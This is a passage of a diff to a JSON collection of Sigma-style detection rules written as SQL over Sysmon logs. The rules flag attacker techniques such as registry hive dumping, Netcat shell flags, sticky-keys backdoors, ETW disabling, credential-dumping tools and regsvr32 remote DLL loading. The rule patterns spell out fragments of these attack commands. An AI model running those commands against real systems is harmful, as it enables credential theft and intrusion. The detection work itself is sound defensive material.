'\\')))" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "status": "experimental", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_mssql_susp_child_process.yml" + }, + { + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "status": "experimental", + "description": "Detects the execution of a renamed version of the Plink binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_vmnat.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "status": "experimental", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.g0004", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR Image LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate ncat use" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", - "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1555.004" + "attack.t1003.001" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_hktl_safetykatz.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", - "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", - "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1055.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_taidoor.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "status": "experimental", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218.010" ], "falsepositives": [ - "Unknown" + "FQDNs that start with a number" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% 